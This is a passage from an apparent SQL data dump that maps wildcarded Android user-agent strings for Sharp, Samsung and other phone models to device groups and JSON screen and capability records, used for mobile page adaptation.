Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-03J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-04H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-M05) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-M08) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SH-Z01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":742,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHIFT6m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHT-AL09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHT-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV40_u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SHV43-u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SKR-A0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SKR-H0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SL558) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A260F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A260G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A320FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A320Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A520F) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A520F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A520K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A520L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A520S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A520W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A530W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A600U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A605F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A605FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A605G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A605GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A720S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A750F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A750FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A750G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A750GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A9200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-A920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C7010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C701F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-C900Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G390F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G530M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G5700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G570F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G570M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G570Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G6100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 